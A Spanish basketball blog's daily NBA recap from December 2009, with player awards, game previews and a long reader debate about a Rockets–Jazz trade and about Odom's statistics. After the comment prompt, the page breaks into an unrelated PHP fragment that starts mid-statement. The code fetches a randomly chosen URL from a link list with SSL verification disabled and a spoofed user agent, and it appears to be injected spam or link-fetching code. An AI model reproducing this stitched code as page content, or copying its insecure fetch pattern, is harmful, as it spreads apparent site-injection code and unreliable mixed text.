La Crónica (09/12/09)

10 de December de 2009 por TheDeerHunter

Suenan las alarmas en varios ilustres del Este. Los “hormiguitas” Rockets le sacaron los colores a Mike Brown. Desastre de Shaq, de Mo, hasta desastre del mismísimo intocable LeBron. No serán los últimos favoritos que caigan en Houston, donde Ariza parece la reencarnación de McGrady. Si no se vuelven locos Brown todavía podrá dormir tranquilo, sin embargo anoche perdió los papeles viendo el esperpento de su equipo. Sensaciones.

Peor lo tiene Del Negro. 9 derrotas de cada 10 es una marca muy bestia para la casa de Air. Anoche palizón contra los Hawks que también puede pasarle a las mejores familias. El problema es que no es un tema puntual. Está sentenciado. En Indiana la lesión de Granger deja tocado de muerte a O’Brien y en manos de Dahntay Jones. Ya lo puede hacer bien el hombre… Un duelo mano a mano contra Roy no puede tener color, aunque los Blazers lo van a pasar casi tan mal como los Pacers.Por su parte, los Pistons sacaron tajada de la pájara de los Sixers. AI mal contra sus fugaces ex… pero a los Sixers les sacan 15 rebotes de diferencia noche sí y noche también, y eso que Dalembert estuvo fino. Van 3 victorias seguidas de los Pistons y ahí se ha notado la mano de Kuester en ciertos cambios significativos. Villanueva al banco, descubrimiento de Jebreko y recuperación de Maxiell e incluso Kwane para la causa (además de Big Ben). Otros con mejores mimbres van muy por debajo suyo. Ojito con él.

Por último, en la lista de entrenadores del Este con malos resultados no podemos olvidarnos de Jay Triano. Anoche si juego yo en los Bucks hago dobles figuras y es que pocas defensas tan tristes nos hemos tirado a la cara. Al menos Nelson aporta cosas nuevas en sus experimentos.

Pasando al Oeste, por si éramos pocos, reaccionan dos cocos. CP3 anotó el clutch contra los Wolves en back to back al filo de la navaja. Los resultados convencen más que el juego pero se ponen a las puertas. Los Spurs lo tuvieron más fácil contra unos buenos Kings. Buen partido de Richard Jefferson, que llevaba tiempo sin dignarse.

Por último, palizón en el último cuarto de los Lakers a los Jazz. Los amarillos van sobradísimos y los próximos partidos son contra Wolves y luego gira por Salt Lake, Chicago, Milwaukee y New Jersey. Si los Jazz no los logran parar en casa no les será difícil alcanzar la racha de 15. Y Gasol invicto, de momento.

PREMIOS

MVP: Grandes partidos de Rodney Stuckey (27-5-8), Brandon Roy (29-7-5) y Kobe Bryant (27-6-8), pero permitidme que le premio se lo de a la pareja Ariza-Brooks, que anotaron 53 puntos entre los 2 para doblegar a los Cleveland Cavaliers de Lebron y su club de danzarines. ¡Grande Houston!

Rookie: Pues la camada del 2009 será una de las más flojas de los últimos años pero cada uno destaca algun rookie aparte de los Jennings (22 p – 6 a) o Evans (19-4-5). Esta noche merecen mención los  doble-doble de Tyler Hansbrough y Jonas Jebreko, los 17 puntos en 19 minutos de James Johnson, los 20 puntos y 7 rebotes de Omri Casspi y el 8-4-8 de Jeff Teague.

Sorpresa: Parece que a Samuel Dalembert le ha motivado especialmente la vuelta de Iverson. Ayer volvió a parecer un pivot dominante y se fue a los 17 puntos y 11 rebotes ante Ben Wallace. En la victoria de los Bucks Roko Ukic aprovechó sus minutos para irse a los 17 puntos y por su parte, Richard Jefferson justificó mínimamente su fichaje con 23 puntos y 8 rebotes.

Decepción: Decían que los Bulls estaban echando de menos a Kirk Hinrich pero visto el partido de ayer mejor que no hubiera vuelto nunca. 0 de 9 en tiros de campo nada más y nada menos. El partido (y la temporada) de Hedo Turkoglu tampoco fue para tirar cohetes.

Esfuerzo en vano: Aunque perdió Cleveland no pienso nombrar a Lebron. En su lugar me quedo con Chris Bosh (26-10) y Al Jefferson (17-16).

RAZONES PARA TRASNOCHAR

Noche de jueves, noche de pocos pero buenos partidos en la NBA. En liza, los 2 grandes favoritos del Este: Celtics-Wizards a las 2h00 y Magic-Jazz a las 4h30. Antes, a la 1h30 Denver visita la cancha de unos renacidos Pistons.

VIDEO

En el menú, Tony Parker y una más de sus increíbles penetraciones, grandísimo mate de espaldas de Trevor Ariza, pinchito de merluza de Devin Harris, Delfino por partida doble (¡madre día, vaya tapón a DeRozan!)…

Comenta

25 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Adelman, Adelman, Adelman, Adelman, Adelman, Adelman…jugón!!!! Vaya crack de entrenador. Ariza mucho mejor de lo que me esperaba, en serio me está sorprendiendo muy gratamente, por ahora Most Improve Player sin duda. Abro debate, Mcgrady por?

    Bargnani y Turkoglu, club se dejaban llevar? (vaya dos contratitos para los próximos cinco años) besando los piés de la señora Collangelo

    Derrick Rose muy mal su segundo año, tendrá problemas físicos?

    Lo de O’neal sigo sin verlo en los Cavs, otro año perdido? Los Lakers están a años luz….

    Un saludo,
    Pablo

      Citar

  2. Viva_Dirk dice:
    #2

    McGrady deberian intentar venderlo por un interior, Utah, Chicago y Clippers serian buenos sitios para preguntar.

      Citar

  3. pcerezo dice:
    #3

    Por cierto leed el post de “La Tanqueta” en el marca:

    http://www.marca.com/blogs/marc-gasol/2009/12/10/como-conoci-a-shaquille.html

    Qué cabroncete se calla lo más jugoso sobre lo de Shaq y no dice ni pío de Iverson…
    Por cierto que pensáis, yo creo que Marc Gasol es el nuevo “A la chita callando (Kristic)”…poco a poco numeritos muy buenos y seguro que en dos años un muy buen contrato.

    Pablo

      Citar

  4. TheDeerHunter dice:
    #4

    Recojo el guante con lo de T-Mac:
    Trade Rockets-Jazz:
    T-Mac se iría rumbo a Salt Lake, junto con Landry y Brian Cook. (montante total 29 kilos, todos expirings)
    A cambio llegan a Houston Boozer y Kirilenko (casi 29kilos, con un año extra para kirilenko)

    Landry es una pérdida sensible para Houston, pero con la incorporación de Boozer y Kirilenko automáticamente vuelve a estar en la pomada del Oeste. Perfectamente 55 victorias y/o top4. Como contrapartida se comen el año extra del contrataco de K. pero según como muevan sus fichas podrían renovar a Boozer. Imagináos el año que viene: Brooks, Ariza, Battier, Boozer, Yao, Kirilenko, Scola… no tiene mala pinta, ¿no??

    Los Jazz no ganan tanto deportivamente hablando, pero económicamente se ahorran 29 kilos de golpe y porrazo. La plantilla queda perfectamente compensada dándole espacio a Millsap. Con Landry las posiciones interiores quedan perfectamente cubiertas (quizás no con la bestial contribución de este año de Boozer, aunque ya le conocemos) No me cabe duda que T-Mac y la vuelta de CJ Miles compensarán con creces lo de Kirilenko, con la ventaja de que si no sale el experimento el año que viene no tienen que seguir pagando un pastizal por narices.
    Con todo creo que casi tendrían las mismas opciones deportivas haciendo el trade que sin hacerlo…

      Citar

  5. Txusma dice:
    #5

    Soy el único al que le empieza a hacer ilusión que los Cavs palmen? En serio, esos bailecitos y shows q se pegan antes de empezar me ponen nervioso y creo que a algún otro jugador de la NBA también (de hecho, hace dos días Noah le dijo un par de cosas al “Rey”).

    Y otro voto para Adelman como entrenador del año aunq no acabe como uno de los 5-6 mejores equipos.

      Citar

  6. pcerezo dice:
    #6

    Estoy contigo txusma, insoportable ese Lebron mofándose de los débiles dan ganas de darles un sopapo.
    Jugón Noah llamándole prostituta…

    Por favor que no le nombren entrenador del año que al siguiente está despedido, vaya maldición…pero estoy contigo.
    Yo creo que Adelman, Westphal y Doc Rivers son los únicos que pueden plantar batalla en un cara a cara con Jackson, evidentemente si tuvieran equipos parejos, son sin duda los mejores entrenadores de la NBA.

    Para mi es un expediente X que Westphal no tuviera equipo…

    Un saludo,
    Pablo

      Citar

  7. toni dice:
    #7

    Buen trade el que proponeis, Adelman con ese equipo haría algo bastante serio.

    Los Cavs estan mordiendo el polvo de momento, que siga que siga.

    Los Lakers llevan el mismo ritmo que el Barça (de futbol).

    Aii madre mia que yo puse manager del año a Colangelo… no tiene nombre.

      Citar

  8. Love Denise dice:
    #8

    deer, segun hoopshype, landry acaba contrato en 2011.
    Con el trade que propones, Houston con el gran Adelman llegarían seguro a la final del Oeste, y ahí contra los Lakers podría pasar cualquier cosa, pero no creo que Utah hiciera ese intercambio, los deja con todo el culo al aire, a pesar de esos 29 millones $.
    Los lakers estan muy bien ….. pero sigo viendo a Orlando por delante, pero V GUndy deberia meter a Bass en la rotación. La actitud de Odom no me gusta en determinados partidos.
    Por muy bueno que sea Lebron, tal y como estan jugando los Cavs, es muy dificil que le puedan ganar una serie a CEltics o Magic, un equipo nunca puede tener tanta dependencia a un jugador por muy bueno que éste sea.

    No quiero ser oportunista, pero….7/21 en sus 2 partidos son los números que ha firmado Iverson.

      Citar

  9. sergio dice:
    #9

    El trade es interesante, pero preguntarle a Sloan a ver que opina. Battier este año esta inconmensurable en defensa, si no esta en el quinteto ideal defensivo al nivel que esta jugando…. tongo. O sea, que Kirilenko no lo quieren ni bendito. Creo mas conveniente la llegada de un pivot medianamente decente. Quizas Brad Miller o Camby… incluso veo mas posible que traigan a Millsap que a Boozer con la temporada que esta haciendo el tio. Eso si, los manager hacen estupideces y genialidades a partes iguales. Aqui todo es posible.

      Citar

  10. MagicJohnson32 dice:
    #10

    El Club LeBron Sucks crece. Mola, jaja.

    Si podéis, poneos el 4º cuarto del Jazz @ Lakers (creo que está completo en youtube). D-fens!! D-fens!! Espectacular realmente el nivel que alcanzan por momento los Lakers en defensa y en ataque.

    Sobre Marc, me preocupa que estos dos años ha empezado como una moto, casi que demasiado fuerte. El año pasado fue bajando el rendimiento y este año parece que le está pasando, porque lleva unos partidos flojos.

      Citar

  11. TheDeerHunter dice:
    #11

    @Sergio: ¿no quieren a kirilenko ni bendito?? te recuerdo que Battier defiende tan bien a los aleros como a los 3s rivales. Defensivamente me parece superior la pareja Battier-Kiril. que Ariza-Battier. Un perímetro defensivo con esos tres bailando posiciones y podiendo dar cerita es una puñetera barricada. Sin contar que Kirilenko también puede jugar de 4. Adelman haría maravillas con todo ese arsenal táctico.
    ¿Y Sloan que diría?? pues… que le quitan un problema de encima con Kirilenko y le equilibran ofensivamente (y porqué no defensivamente) el equipo.
    Supongo que el que menos contento de todos estaría sería T-Mac, pero con ese equipo hasta él podría ganar una ronda de playoffs.

    Clippers no lo veo viable. No necesitan a T-Mac. Chicago podría ser… pero el equipo se queda cojo hagas lo que hagas y lo que puedes traer a Houston tampoco mejora tento lo que tienes.

    @LoveDenise: Yo creo que el equipillo que le quedaría a los Jazz no sólo que es apañado, sino que está más compensado que el otro. En cualquier caso, el final de Boozer en Utah es un hecho… ¿qué más les da perderlo unos meses antes de tiempo y sacar algo de provecho a cambio?? De Kirilenko, entiendo, que están deseando deshacerse.
    El año pasado jugaron muy bien sin Boozer y con Millsap. Ahora encima te quedaría a Landry de regalo (un jugador perfecto para Sloan) y además la posición de 2 más que cubierta hasta el final de año (más luego más de 20 kilos para gastar en el famoso 2010)
    Del contrato de Landry… lo he sacado de la trademachine de la ESPN, es posible que haya algún error o no esté totalmente actualizado.

    ¿En serio que sigues viendo a los Magic por delante?? Te recuerdo que han perdido contra Detroit, Oklahoma… Si hablamos de sensaciones tú mismo decías que no entiendes la proporción de tiros en el equipo. Yo tampoco… y en los Lakers la entiendo perfectamente (mejor dicho, es perfecta)
    Los Lakers están mostrando picos de juego a un nivel inalcanzable al resto de la liga. Y para mí Kobe es el MVP de la temporada con cierta diferencia. El mejor Kobe de la historia. Está anotando lo que le da la gana.

    PD: ¿¿Iverson 21 tiros en dos partidos?? ¿quémestáscontando??? ¡A la hoguera con él, por lanzar poco!!!

      Citar

  12. MagicJohnson32 dice:
    #12

    Hablando de entrenadores… ¿Del Negro llegará a navidades? Para mí que no.

    A LOVE DENISE… La actitud de Odom es la misma desde que su madre lo parió hace 30 años. En ataque desaparece a ratos, la caga con cierta frecuencia, a veces se marca un jugadón y cambia el ritmo del partido… Todo eso ya lo sabemos. Pero en defensa está currando y su juego de pase dentro-fuera le va perfecto a Pau y Artest. Ah, y es el único jugador de toda la liga que promedia más de 8 puntos y más de 4 asistencias. Es un lujo tenerlo como 6º hombre.

      Citar

  13. TheDeerHunter dice:
    #13

    ya veo lo que atiendes en mis crónicas, Magic

      Citar

  14. MagicJohnson32 dice:
    #14

    Si lo decía por retomar lo que apuntas en la crónica… que nadie ha dicho nada y me parece uno de los temas para comentar. Con Rose a este nivel (aunque parece que empieza a espabilar) poco pueden hacer los Bulls, y eso que no veía a Deng también desde hace mucho.

      Citar

  15. TheDeerHunter dice:
    #15

    Te libras…

      Citar

  16. the choosen one dice:
    #16

    “es el único jugador de toda la liga que promedia más de 8 puntos y más de 4 asistencias”
    creo que te has colado no?

      Citar

  17. Txusma dice:
    #17

    En la frase de Magic ha de faltar algo por narices 😀

    De hecho hay 46 jugadores que superan esos promedios y Odom es el que menos anota de todos…

    Como no se refiera al único PF…

      Citar

  18. sergio dice:
    #18

    Quizas se refiera a suplente no?? y puede ser que ni aun asi…

    Yo lo de una pareja Battier-Kirilenko no lo veo por la simple razon de la capacidad ofensiva del equipo… creo que tener a alguien como Ariza anotando con regularidad les viene mejor. Y Ariza tambien es bastante bueno defensivamente, no lo olvidemos. Eso si, Seria un recambio de lujo para cualquiera de ellos. Creo que es de los pocos jugadores que ha conseguido hacer un 5-5 (mas de 5 en 5 apartados estadisticos diferentes: puntos, rebotes, asistencias, robos y tapones)

      Citar

  19. NBA LAKERS BLOG dice:
    #19

    Coincido en eso de que parece que Ariza es la reencarnación de T-Mac, jeje… una lastima el momento de los Bulls, y qué alegría el momento de los Lakers 😀 jaja…

    Te invito a nuestro blog de los Lakers 😉

    Un abrazo!

    –NM–

      Citar

  20. Love Denise dice:
    #20

    unico de la liga en superar 8 p y 4 asist? que quieres decir magicjohnson? jarret jack incluso es suplente y supera esos numeros

    @deer, las derrotas que tu hablas de orlando, debes recordar como han sido:
    vs detroit: bajas de lewis y pietrus. Fuera de casa, Pierden por 5
    vs oklahoma: bajas de lewis, carter y andreson. Fuera de casa, pierden por 32
    vs cleveland: bajas de lewis y anderson. Pierden de 9 contra uno de los mejores equipos
    vs miami: Baja de nelson, tiran el partido cuando ganaban de 3 a falta de 10 segundos, para perder por 1 en el último segundo.
    vs jazz: pierden de 9 tras ir ganando de hasta 16, comprensible perder fuera de casa en Utah.
    Es decir, las derrotas que han sufrido son bastante comprensibles, a mi parecer, cometen 3 errores:
    1- muchos tiros de Carter
    2- pocos balones a Howard
    3- bass no entra en la rotacion.
    Pero el banquillo de Lakers es de risa en comparacion al de los Magic, claro, que en una serie, los 5 buenos de los Lakers y los 2 (Fisher y Brown) medianias se pueden bastar para ganarles, pero en equipo, los Magic son superiores.

    respecto a iverson….hombre, solo faltaria que con esos pésimos % siguiera tirandose sus 25 tiros? Y tu quieres que tire más?

    el trade que propones, es bueno para utah si quiere reconstruir, es verdad que le dejaría muchos $ para fichar a agentes libres, pero Utah no es una ciudad muy apetecible para los jugadores.

      Citar

  21. pcerezo dice:
    #21

    Dos apuntitos:

    – El trade es perfecto para Rockets. Apuntala una plantilla a corto plazo y deja espacio para el año que viene. Para Utah los desequilibra a corto plazo y deja margen para el año que viene, pero es que el año que viene tiene margen todo el mundo.

    – No creo que Orlando esté mejor o por encima de Lakers. Los Lagueros son los mejores y lo saben veo muy difícil que se les escape el anillo, solo las lesiones lo puede permitir y lo de Odom son sus momentos pero habrá que ir mirando el estado de forma de la gente despues del All-Star. Estos tíos llevan jugando a lo mismo un año y medio.

    Un saludo,
    Pablo

      Citar

  22. Love Denise dice:
    #22

    muy bueno el blog de NBA Lakers, te felicito por tu buen trabajo.

    Salieron las votaciones para el All-Star, buenos datos para Pau y Marc. Pau seguro que estará allí, Marc lo tiene más complicado, quizás si sigue con estos números y Memphis sigue ganando, tendría alguna opción por parte de la elección del entrenador en cuestión.
    Aunque sinceramente, cada año me aburre más el All-Star Game, no estaría mal cambiar el formato, o probar por un año a hacer un EEUU vs Resto del mundo, o un formato tipo Copa del Rey. Pienso que sería interesante.

      Citar

  23. MagicJohnson32 dice:
    #23

    Jajaja, vale, vale, me equivoqué al escribir…

    Quise decir que Odom es el único jugador de la liga que promedia más de 8 rebotes y más de 4 asistencias.

    A ver quién me lleva la contraria ahora xD

      Citar

  24. Love Denise dice:
    #24

    Yo te llevo la contraria

    Pau Gasol tambien lleva más de 8 rebotes y 4 asistencias

      Citar

  25. MagicJohnson32 dice:
    #25

    Juas, ya veo que Pau ha subido su promedio de asistencias en los últimos dos partidos hasta alcanzar las 4 de media… En fin, casi que me callo, pero me sirve lo de “el único suplente que promedia bla bla”. En fin, un lujo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>